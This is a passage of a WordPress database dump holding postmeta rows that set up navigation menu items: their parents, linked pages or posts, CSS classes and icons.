_item_object','page'),(49930,4101,'_menu_item_target',''),(49931,4101,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49932,4101,'_menu_item_xfn',''),(49933,4101,'_menu_item_url',''),(49934,4101,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49935,4101,'_menu_item_icon','null'),(49936,4102,'_menu_item_type','post_type'),(49937,4102,'_menu_item_menu_item_parent','4022'),(49938,4102,'_menu_item_object_id','3071'),(49939,4102,'_menu_item_object','page'),(49940,4102,'_menu_item_target',''),(49941,4102,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49942,4102,'_menu_item_xfn',''),(49943,4102,'_menu_item_url',''),(49944,4102,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49945,4102,'_menu_item_icon','null'),(49946,4103,'_menu_item_type','post_type'),(49947,4103,'_menu_item_menu_item_parent','4025'),(49948,4103,'_menu_item_object_id','3070'),(49949,4103,'_menu_item_object','page'),(49950,4103,'_menu_item_target',''),(49951,4103,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49952,4103,'_menu_item_xfn',''),(49953,4103,'_menu_item_url',''),(49954,4103,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49955,4103,'_menu_item_icon','null'),(49956,4104,'_menu_item_type','post_type'),(49957,4104,'_menu_item_menu_item_parent','4025'),(49958,4104,'_menu_item_object_id','3069'),(49959,4104,'_menu_item_object','page'),(49960,4104,'_menu_item_target',''),(49961,4104,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49962,4104,'_menu_item_xfn',''),(49963,4104,'_menu_item_url',''),(49964,4104,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49965,4104,'_menu_item_icon','null'),(49966,4105,'_menu_item_type','post_type'),(49967,4105,'_menu_item_menu_item_parent','4022'),(49968,4105,'_menu_item_object_id','3072'),(49969,4105,'_menu_item_object','page'),(49970,4105,'_menu_item_target',''),(49971,4105,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49972,4105,'_menu_item_xfn',''),(49973,4105,'_menu_item_url',''),(49974,4105,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49975,4105,'_menu_item_icon','null'),(49976,4106,'_menu_item_type','post_type'),(49977,4106,'_menu_item_menu_item_parent','4018'),(49978,4106,'_menu_item_object_id','3072'),(49979,4106,'_menu_item_object','page'),(49980,4106,'_menu_item_target',''),(49981,4106,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49982,4106,'_menu_item_xfn',''),(49983,4106,'_menu_item_url',''),(49984,4106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49985,4106,'_menu_item_icon','null'),(49986,4107,'_menu_item_type','post_type'),(49987,4107,'_menu_item_menu_item_parent','4018'),(49988,4107,'_menu_item_object_id','1382'),(49989,4107,'_menu_item_object','page'),(49990,4107,'_menu_item_target',''),(49991,4107,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(49992,4107,'_menu_item_xfn',''),(49993,4107,'_menu_item_url',''),(49994,4107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(49995,4107,'_menu_item_icon','null'),(49996,4108,'_menu_item_type','post_type'),(49997,4108,'_menu_item_menu_item_parent','4022'),(49998,4108,'_menu_item_object_id','1382'),(49999,4108,'_menu_item_object','page'),(50000,4108,'_menu_item_target',''),(50001,4108,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50002,4108,'_menu_item_xfn',''),(50003,4108,'_menu_item_url',''),(50004,4108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50005,4108,'_menu_item_icon','null'),(50006,4109,'_menu_item_type','post_type'),(50007,4109,'_menu_item_menu_item_parent','4024'),(50008,4109,'_menu_item_object_id','1393'),(50009,4109,'_menu_item_object','page'),(50010,4109,'_menu_item_target',''),(50011,4109,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50012,4109,'_menu_item_xfn',''),(50013,4109,'_menu_item_url',''),(50014,4109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50015,4109,'_menu_item_icon','null'),(50016,4110,'_menu_item_type','post_type'),(50017,4110,'_menu_item_menu_item_parent','4023'),(50018,4110,'_menu_item_object_id','1650'),(50019,4110,'_menu_item_object','page'),(50020,4110,'_menu_item_target',''),(50021,4110,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50022,4110,'_menu_item_xfn',''),(50023,4110,'_menu_item_url',''),(50024,4110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50025,4110,'_menu_item_icon','null'),(50026,4111,'_menu_item_type','post_type'),(50027,4111,'_menu_item_menu_item_parent','4024'),(50028,4111,'_menu_item_object_id','1642'),(50029,4111,'_menu_item_object','page'),(50030,4111,'_menu_item_target',''),(50031,4111,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50032,4111,'_menu_item_xfn',''),(50033,4111,'_menu_item_url',''),(50034,4111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50035,4111,'_menu_item_icon','null'),(50036,4112,'_menu_item_type','post_type'),(50037,4112,'_menu_item_menu_item_parent','4019'),(50038,4112,'_menu_item_object_id','1650'),(50039,4112,'_menu_item_object','page'),(50040,4112,'_menu_item_target',''),(50041,4112,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50042,4112,'_menu_item_xfn',''),(50043,4112,'_menu_item_url',''),(50044,4112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50045,4112,'_menu_item_icon','null'),(50046,4113,'_menu_item_type','post_type'),(50047,4113,'_menu_item_menu_item_parent','4020'),(50048,4113,'_menu_item_object_id','1642'),(50049,4113,'_menu_item_object','page'),(50050,4113,'_menu_item_target',''),(50051,4113,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50052,4113,'_menu_item_xfn',''),(50053,4113,'_menu_item_url',''),(50054,4113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50055,4113,'_menu_item_icon','null'),(50056,4114,'_menu_item_type','post_type'),(50057,4114,'_menu_item_menu_item_parent','4020'),(50058,4114,'_menu_item_object_id','1393'),(50059,4114,'_menu_item_object','page'),(50060,4114,'_menu_item_target',''),(50061,4114,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50062,4114,'_menu_item_xfn',''),(50063,4114,'_menu_item_url',''),(50064,4114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50065,4114,'_menu_item_icon','null'),(50066,4115,'_menu_item_type','post_type'),(50067,4115,'_menu_item_menu_item_parent','4019'),(50068,4115,'_menu_item_object_id','1658'),(50069,4115,'_menu_item_object','page'),(50070,4115,'_menu_item_target',''),(50071,4115,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50072,4115,'_menu_item_xfn',''),(50073,4115,'_menu_item_url',''),(50074,4115,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50075,4115,'_menu_item_icon','icon-star'),(50076,4115,'_menu_item_icon_pack','simple_line_icons'),(50077,4116,'_menu_item_type','post_type'),(50078,4116,'_menu_item_menu_item_parent','4023'),(50079,4116,'_menu_item_object_id','1658'),(50080,4116,'_menu_item_object','page'),(50081,4116,'_menu_item_target',''),(50082,4116,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50083,4116,'_menu_item_xfn',''),(50084,4116,'_menu_item_url',''),(50085,4116,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50086,4116,'_menu_item_icon','icon-star'),(50087,4116,'_menu_item_icon_pack','simple_line_icons'),(50088,4117,'_menu_item_type','post_type'),(50089,4117,'_menu_item_menu_item_parent','4022'),(50090,4117,'_menu_item_object_id','1662'),(50091,4117,'_menu_item_object','page'),(50092,4117,'_menu_item_target',''),(50093,4117,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50094,4117,'_menu_item_xfn',''),(50095,4117,'_menu_item_url',''),(50096,4117,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50097,4117,'_menu_item_icon','null'),(50098,4118,'_menu_item_type','post_type'),(50099,4118,'_menu_item_menu_item_parent','4018'),(50100,4118,'_menu_item_object_id','1662'),(50101,4118,'_menu_item_object','page'),(50102,4118,'_menu_item_target',''),(50103,4118,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50104,4118,'_menu_item_xfn',''),(50105,4118,'_menu_item_url',''),(50106,4118,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50107,4118,'_menu_item_icon','null'),(50108,4119,'_menu_item_type','post_type'),(50109,4119,'_menu_item_menu_item_parent','4019'),(50110,4119,'_menu_item_object_id','1722'),(50111,4119,'_menu_item_object','page'),(50112,4119,'_menu_item_target',''),(50113,4119,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50114,4119,'_menu_item_xfn',''),(50115,4119,'_menu_item_url',''),(50116,4119,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50117,4119,'_menu_item_icon','icon-star'),(50118,4119,'_menu_item_icon_pack','simple_line_icons'),(50119,4120,'_menu_item_type','post_type'),(50120,4120,'_menu_item_menu_item_parent','4023'),(50121,4120,'_menu_item_object_id','1722'),(50122,4120,'_menu_item_object','page'),(50123,4120,'_menu_item_target',''),(50124,4120,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50125,4120,'_menu_item_xfn',''),(50126,4120,'_menu_item_url',''),(50127,4120,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50128,4120,'_menu_item_icon','icon-star'),(50129,4120,'_menu_item_icon_pack','simple_line_icons'),(50130,4121,'_menu_item_type','post_type'),(50131,4121,'_menu_item_menu_item_parent','4022'),(50132,4121,'_menu_item_object_id','3073'),(50133,4121,'_menu_item_object','page'),(50134,4121,'_menu_item_target',''),(50135,4121,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50136,4121,'_menu_item_xfn',''),(50137,4121,'_menu_item_url',''),(50138,4121,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50139,4121,'_menu_item_icon','null'),(50140,4122,'_menu_item_type','post_type'),(50141,4122,'_menu_item_menu_item_parent','4024'),(50142,4122,'_menu_item_object_id','1734'),(50143,4122,'_menu_item_object','page'),(50144,4122,'_menu_item_target',''),(50145,4122,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50146,4122,'_menu_item_xfn',''),(50147,4122,'_menu_item_url',''),(50148,4122,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50149,4122,'_menu_item_icon','null'),(50150,4123,'_menu_item_type','post_type'),(50151,4123,'_menu_item_menu_item_parent','4018'),(50152,4123,'_menu_item_object_id','3073'),(50153,4123,'_menu_item_object','page'),(50154,4123,'_menu_item_target',''),(50155,4123,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50156,4123,'_menu_item_xfn',''),(50157,4123,'_menu_item_url',''),(50158,4123,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50159,4123,'_menu_item_icon','null'),(50160,4124,'_menu_item_type','post_type'),(50161,4124,'_menu_item_menu_item_parent','4020'),(50162,4124,'_menu_item_object_id','1734'),(50163,4124,'_menu_item_object','page'),(50164,4124,'_menu_item_target',''),(50165,4124,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50166,4124,'_menu_item_xfn',''),(50167,4124,'_menu_item_url',''),(50168,4124,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50169,4124,'_menu_item_icon','null'),(50170,4125,'_menu_item_type','post_type'),(50171,4125,'_menu_item_menu_item_parent','3991'),(50172,4125,'_menu_item_object_id','1679'),(50173,4125,'_menu_item_object','page'),(50174,4125,'_menu_item_target',''),(50175,4125,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50176,4125,'_menu_item_xfn',''),(50177,4125,'_menu_item_url',''),(50178,4125,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50179,4125,'_menu_item_icon','null'),(50180,4126,'_menu_item_type','post_type'),(50181,4126,'_menu_item_menu_item_parent','4028'),(50182,4126,'_menu_item_object_id','3770'),(50183,4126,'_menu_item_object','post'),(50184,4126,'_menu_item_target',''),(50185,4126,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50186,4126,'_menu_item_xfn',''),(50187,4126,'_menu_item_url',''),(50188,4126,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50189,4126,'_menu_item_icon','null'),(50190,4127,'_menu_item_type','post_type'),(50191,4127,'_menu_item_menu_item_parent','4028'),(50192,4127,'_menu_item_object_id','1685'),(50193,4127,'_menu_item_object','post'),(50194,4127,'_menu_item_target',''),(50195,4127,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50196,4127,'_menu_item_xfn',''),(50197,4127,'_menu_item_url',''),(50198,4127,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50199,4127,'_menu_item_icon','null'),(50200,4128,'_menu_item_type','post_type'),(50201,4128,'_menu_item_menu_item_parent','4028'),(50202,4128,'_menu_item_object_id','1677'),(50203,4128,'_menu_item_object','post'),(50204,4128,'_menu_item_target',''),(50205,4128,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50206,4128,'_menu_item_xfn',''),(50207,4128,'_menu_item_url',''),(50208,4128,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50209,4128,'_menu_item_icon','null'),(50210,4129,'_menu_item_type','post_type'),(50211,4129,'_menu_item_menu_item_parent','4028'),(50212,4129,'_menu_item_object_id','1671'),(50213,4129,'_menu_item_object','post'),(50214,4129,'_menu_item_target',''),(50215,4129,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50216,4129,'_menu_item_xfn',''),(50217,4129,'_menu_item_url',''),(50218,4129,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50219,4129,'_menu_item_icon','null'),(50220,4130,'_menu_item_type','post_type'),(50221,4130,'_menu_item_menu_item_parent','4028'),(50222,4130,'_menu_item_object_id','1670'),(50223,4130,'_menu_item_object','post'),(50224,4130,'_menu_item_target',''),(50225,4130,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50226,4130,'_menu_item_xfn',''),(50227,4130,'_menu_item_url',''),(50228,4130,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50229,4130,'_menu_item_icon','null'),(50230,4131,'_menu_item_type','post_type'),(50231,4131,'_menu_item_menu_item_parent','4028'),(50232,4131,'_menu_item_object_id','1681'),(50233,4131,'_menu_item_object','post'),(50234,4131,'_menu_item_target',''),(50235,4131,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50236,4131,'_menu_item_xfn',''),(50237,4131,'_menu_item_url',''),(50238,4131,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50239,4131,'_menu_item_icon','null'),(50240,4132,'_menu_item_type','post_type'),(50241,4132,'_menu_item_menu_item_parent','4019'),(50242,4132,'_menu_item_object_id','1742'),(50243,4132,'_menu_item_object','page'),(50244,4132,'_menu_item_target',''),(50245,4132,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50246,4132,'_menu_item_xfn',''),(50247,4132,'_menu_item_url',''),(50248,4132,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50249,4132,'_menu_item_icon','null'),(50250,4133,'_menu_item_type','post_type'),(50251,4133,'_menu_item_menu_item_parent','4023'),(50252,4133,'_menu_item_object_id','1742'),(50253,4133,'_menu_item_object','page'),(50254,4133,'_menu_item_target',''),(50255,4133,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50256,4133,'_menu_item_xfn',''),(50257,4133,'_menu_item_url',''),(50258,4133,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50259,4133,'_menu_item_icon','null'),(50260,4134,'_menu_item_type','post_type'),(50261,4134,'_menu_item_menu_item_parent','4018'),(50262,4134,'_menu_item_object_id','1804'),(50263,4134,'_menu_item_object','page'),(50264,4134,'_menu_item_target',''),(50265,4134,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50266,4134,'_menu_item_xfn',''),(50267,4134,'_menu_item_url',''),(50268,4134,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50269,4134,'_menu_item_icon','null'),(50270,4135,'_menu_item_type','post_type'),(50271,4135,'_menu_item_menu_item_parent','4022'),(50272,4135,'_menu_item_object_id','1804'),(50273,4135,'_menu_item_object','page'),(50274,4135,'_menu_item_target',''),(50275,4135,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50276,4135,'_menu_item_xfn',''),(50277,4135,'_menu_item_url',''),(50278,4135,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50279,4135,'_menu_item_icon','null'),(50280,4136,'_menu_item_type','post_type'),(50281,4136,'_menu_item_menu_item_parent','4001'),(50282,4136,'_menu_item_object_id','3053'),(50283,4136,'_menu_item_object','page'),(50284,4136,'_menu_item_target',''),(50285,4136,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50286,4136,'_menu_item_xfn',''),(50287,4136,'_menu_item_url',''),(50288,4136,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50289,4137,'_menu_item_type','post_type'),(50290,4137,'_menu_item_menu_item_parent','4001'),(50291,4137,'_menu_item_object_id','3055'),(50292,4137,'_menu_item_object','page'),(50293,4137,'_menu_item_target',''),(50294,4137,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50295,4137,'_menu_item_xfn',''),(50296,4137,'_menu_item_url',''),(50297,4137,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50298,4138,'_menu_item_type','post_type'),(50299,4138,'_menu_item_menu_item_parent','4020'),(50300,4138,'_menu_item_object_id','1836'),(50301,4138,'_menu_item_object','page'),(50302,4138,'_menu_item_target',''),(50303,4138,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50304,4138,'_menu_item_xfn',''),(50305,4138,'_menu_item_url',''),(50306,4138,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50307,4138,'_menu_item_icon','null'),(50308,4139,'_menu_item_type','post_type'),(50309,4139,'_menu_item_menu_item_parent','4021'),(50310,4139,'_menu_item_object_id','1827'),(50311,4139,'_menu_item_object','page'),(50312,4139,'_menu_item_target',''),(50313,4139,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50314,4139,'_menu_item_xfn',''),(50315,4139,'_menu_item_url',''),(50316,4139,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50317,4139,'_menu_item_icon','null'),(50318,4140,'_menu_item_type','post_type'),(50319,4140,'_menu_item_menu_item_parent','4024'),(50320,4140,'_menu_item_object_id','1836'),(50321,4140,'_menu_item_object','page'),(50322,4140,'_menu_item_target',''),(50323,4140,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50324,4140,'_menu_item_xfn',''),(50325,4140,'_menu_item_url',''),(50326,4140,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50327,4140,'_menu_item_icon','null'),(50328,4141,'_menu_item_type','post_type'),(50329,4141,'_menu_item_menu_item_parent','4025'),(50330,4141,'_menu_item_object_id','1827'),(50331,4141,'_menu_item_object','page'),(50332,4141,'_menu_item_target',''),(50333,4141,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50334,4141,'_menu_item_xfn',''),(50335,4141,'_menu_item_url',''),(50336,4141,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50337,4141,'_menu_item_icon','null'),(50338,4142,'_menu_item_type','post_type'),(50339,4142,'_menu_item_menu_item_parent','4002'),(50340,4142,'_menu_item_object_id','3054'),(50341,4142,'_menu_item_object','page'),(50342,4142,'_menu_item_target',''),(50343,4142,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50344,4142,'_menu_item_xfn',''),(50345,4142,'_menu_item_url',''),(50346,4142,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50347,4143,'_menu_item_type','post_type'),(50348,4143,'_menu_item_menu_item_parent','4002'),(50349,4143,'_menu_item_object_id','3052'),(50350,4143,'_menu_item_object','page'),(50351,4143,'_menu_item_target',''),(50352,4143,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50353,4143,'_menu_item_xfn',''),(50354,4143,'_menu_item_url',''),(50355,4143,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50356,4144,'_menu_item_type','post_type'),(50357,4144,'_menu_item_menu_item_parent','4002'),(50358,4144,'_menu_item_object_id','3051'),(50359,4144,'_menu_item_object','page'),(50360,4144,'_menu_item_target',''),(50361,4144,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50362,4144,'_menu_item_xfn',''),(50363,4144,'_menu_item_url',''),(50364,4144,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50365,4145,'_menu_item_type','post_type'),(50366,4145,'_menu_item_menu_item_parent','4002'),(50367,4145,'_menu_item_object_id','3049'),(50368,4145,'_menu_item_object','page'),(50369,4145,'_menu_item_target',''),(50370,4145,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50371,4145,'_menu_item_xfn',''),(50372,4145,'_menu_item_url',''),(50373,4145,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50374,4146,'_menu_item_type','post_type'),(50375,4146,'_menu_item_menu_item_parent','4004'),(50376,4146,'_menu_item_object_id','3065'),(50377,4146,'_menu_item_object','page'),(50378,4146,'_menu_item_target',''),(50379,4146,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50380,4146,'_menu_item_xfn',''),(50381,4146,'_menu_item_url',''),(50382,4146,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50383,4147,'_menu_item_type','post_type'),(50384,4147,'_menu_item_menu_item_parent','4004'),(50385,4147,'_menu_item_object_id','3066'),(50386,4147,'_menu_item_object','page'),(50387,4147,'_menu_item_target',''),(50388,4147,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50389,4147,'_menu_item_xfn',''),(50390,4147,'_menu_item_url',''),(50391,4147,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50392,4148,'_menu_item_type','post_type'),(50393,4148,'_menu_item_menu_item_parent','4004'),(50394,4148,'_menu_item_object_id','3067'),(50395,4148,'_menu_item_object','page'),(50396,4148,'_menu_item_target',''),(50397,4148,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50398,4148,'_menu_item_xfn',''),(50399,4148,'_menu_item_url',''),(50400,4148,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50401,4149,'_menu_item_type','post_type'),(50402,4149,'_menu_item_menu_item_parent','4005'),(50403,4149,'_menu_item_object_id','1679'),(50404,4149,'_menu_item_object','page'),(50405,4149,'_menu_item_target',''),(50406,4149,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50407,4149,'_menu_item_xfn',''),(50408,4149,'_menu_item_url',''),(50409,4149,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50410,4150,'_menu_item_type','post_type'),(50411,4150,'_menu_item_menu_item_parent','4005'),(50412,4150,'_menu_item_object_id','3770'),(50413,4150,'_menu_item_object','post'),(50414,4150,'_menu_item_target',''),(50415,4150,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50416,4150,'_menu_item_xfn',''),(50417,4150,'_menu_item_url',''),(50418,4150,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50419,4151,'_menu_item_type','post_type'),(50420,4151,'_menu_item_menu_item_parent','4005'),(50421,4151,'_menu_item_object_id','1685'),(50422,4151,'_menu_item_object','post'),(50423,4151,'_menu_item_target',''),(50424,4151,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50425,4151,'_menu_item_xfn',''),(50426,4151,'_menu_item_url',''),(50427,4151,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50428,4152,'_menu_item_type','post_type'),(50429,4152,'_menu_item_menu_item_parent','4009'),(50430,4152,'_menu_item_object_id','3770'),(50431,4152,'_menu_item_object','post'),(50432,4152,'_menu_item_target',''),(50433,4152,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50434,4152,'_menu_item_xfn',''),(50435,4152,'_menu_item_url',''),(50436,4152,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50437,4153,'_menu_item_type','post_type'),(50438,4153,'_menu_item_menu_item_parent','4009'),(50439,4153,'_menu_item_object_id','1685'),(50440,4153,'_menu_item_object','post'),(50441,4153,'_menu_item_target',''),(50442,4153,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50443,4153,'_menu_item_xfn',''),(50444,4153,'_menu_item_url',''),(50445,4153,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50446,4154,'_menu_item_type','post_type'),(50447,4154,'_menu_item_menu_item_parent','4009'),(50448,4154,'_menu_item_object_id','1679'),(50449,4154,'_menu_item_object','page'),(50450,4154,'_menu_item_target',''),(50451,4154,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50452,4154,'_menu_item_xfn',''),(50453,4154,'_menu_item_url',''),(50454,4154,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50455,4155,'_menu_item_type','post_type'),(50456,4155,'_menu_item_menu_item_parent','4007'),(50457,4155,'_menu_item_object_id','3054'),(50458,4155,'_menu_item_object','page'),(50459,4155,'_menu_item_target',''),(50460,4155,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50461,4155,'_menu_item_xfn',''),(50462,4155,'_menu_item_url',''),(50463,4155,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50464,4156,'_menu_item_type','post_type'),(50465,4156,'_menu_item_menu_item_parent','4007'),(50466,4156,'_menu_item_object_id','3052'),(50467,4156,'_menu_item_object','page'),(50468,4156,'_menu_item_target',''),(50469,4156,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50470,4156,'_menu_item_xfn',''),(50471,4156,'_menu_item_url',''),(50472,4156,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50473,4157,'_menu_item_type','post_type'),(50474,4157,'_menu_item_menu_item_parent','4007'),(50475,4157,'_menu_item_object_id','3049'),(50476,4157,'_menu_item_object','page'),(50477,4157,'_menu_item_target',''),(50478,4157,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50479,4157,'_menu_item_xfn',''),(50480,4157,'_menu_item_url',''),(50481,4157,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50482,4158,'_menu_item_type','post_type'),(50483,4158,'_menu_item_menu_item_parent','4007'),(50484,4158,'_menu_item_object_id','3043'),(50485,4158,'_menu_item_object','page'),(50486,4158,'_menu_item_target',''),(50487,4158,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50488,4158,'_menu_item_xfn',''),(50489,4158,'_menu_item_url',''),(50490,4158,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50491,4159,'_menu_item_type','post_type'),(50492,4159,'_menu_item_menu_item_parent','4024'),(50493,4159,'_menu_item_object_id','1857'),(50494,4159,'_menu_item_object','page'),(50495,4159,'_menu_item_target',''),(50496,4159,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50497,4159,'_menu_item_xfn',''),(50498,4159,'_menu_item_url',''),(50499,4159,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50500,4159,'_menu_item_icon','null'),(50501,4160,'_menu_item_type','post_type'),(50502,4160,'_menu_item_menu_item_parent','4024'),(50503,4160,'_menu_item_object_id','1852'),(50504,4160,'_menu_item_object','page'),(50505,4160,'_menu_item_target',''),(50506,4160,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50507,4160,'_menu_item_xfn',''),(50508,4160,'_menu_item_url',''),(50509,4160,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50510,4160,'_menu_item_icon','null'),(50511,4161,'_menu_item_type','post_type'),(50512,4161,'_menu_item_menu_item_parent','4020'),(50513,4161,'_menu_item_object_id','1857'),(50514,4161,'_menu_item_object','page'),(50515,4161,'_menu_item_target',''),(50516,4161,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50517,4161,'_menu_item_xfn',''),(50518,4161,'_menu_item_url',''),(50519,4161,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50520,4161,'_menu_item_icon','null'),(50521,4162,'_menu_item_type','post_type'),(50522,4162,'_menu_item_menu_item_parent','4020'),(50523,4162,'_menu_item_object_id','1852'),(50524,4162,'_menu_item_object','page'),(50525,4162,'_menu_item_target',''),(50526,4162,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(50527,4162,'_menu_item_xfn',''),(50528,4162,'_menu_item_url',''),(50529,4162,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(50530,4162,'_menu_item_icon','null'),(50531,4163,'_menu_item_type','pos